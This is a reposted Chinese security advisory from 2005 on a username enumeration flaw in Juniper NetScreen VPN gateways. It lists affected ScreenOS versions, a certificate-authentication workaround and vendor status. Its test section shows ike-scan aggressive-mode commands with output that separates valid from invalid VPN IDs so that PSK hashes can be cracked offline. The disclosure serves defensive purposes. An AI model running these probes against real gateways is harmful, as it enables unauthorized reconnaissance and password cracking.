Juniper Netscreen VPN用户名枚举漏洞

来源:岁月联盟 编辑:zhuzhu 时间:2005-08-20
Juniper Netscreen VPN用户名枚举漏洞 发布日期:2005-08-19
更新日期:2005-08-19

受影响系统:
Juniper Networks ScreenOS 5.2
Juniper Networks ScreenOS 5.1
Juniper Networks NetScreen-IDP <= 500 3.0.1 r1
Juniper Networks NetScreen-5GT 5.0
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 14595

Netscreen是Juniper提供一系列领先的联网和安全产品之一。

Juniper Netscreen集成的防火墙/VPN产品在为客户执行执行VPN安全测试时存在VPN用户名枚举漏洞,成功利用这个漏洞的安全者可以访问VPN保护的网络资源。

安全者可以使用字典安全判断Netscreen上有效的VPN用户名。一旦发现了用户名,安全者就可以使用这个用户名从Netscreen获得哈希,然后离线破解判断相关的口令。

<*来源:Roy Hills (Roy.Hills@nta-monitor.com)
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=112438068426034&w=2
*>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有安全性,仅供安全研究与教学之用。使用者风险自负!

响应有效的用户名"royhills@hotmail.com"

$Content$nbsp;ike-scan -A -M --id=royhills@hotmail.com 10.0.0.1
Starting ike-scan 1.7.7 with 1 hosts (http://www.nta-monitor.com/ike-scan/)
10.0.0.1 Aggressive Mode Handshake returned
         HDR=(CKY-R!af4dbe2cecd5f0)
         SA=(Enc=ES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds
LifeDuration(800)
         VIDd405f46f03b7660a23be116a1975058e69e83870000000400000403
(Netscreen-05)
         VIDH65617274426561745f4e6f74696679386b0100 (Heartbeat Notify)
         KeyExchange(128 bytes)
         Nonce(20 bytes)
         ID(Type=ID_IPV4_ADDR, Value.0.0.1)
         Hash(20 bytes)

Ending ike-scan 1.7.7: 1 hosts scanned in 0.136 seconds (7.37 hosts/sec). 1
returned handshake; 0 returned notify

响应无效的用户名"invalid@hotmail.com"

$Content$nbsp;ike-scan -A -M --id=invalid@hotmail.com 10.0.0.1
Starting ike-scan 1.7.7 with 1 hosts (http://www.nta-monitor.com/ike-scan/)

Ending ike-scan 1.7.7: 1 hosts scanned in 2.467 seconds (0.41 hosts/sec). 0
returned handshake; 0 returned notify

建议:
--------------------------------------------------------------------------------
临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* 使用证书认证而不是预共享密钥认证。

厂商补丁:

Juniper Networks
----------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.juniper.net/

上一篇:Cisco IOS防火墙认证代理缓冲区溢出漏洞
下一篇:Linksys WRT54GS无线认证绕过漏洞

图片内容

最近更新

随机推荐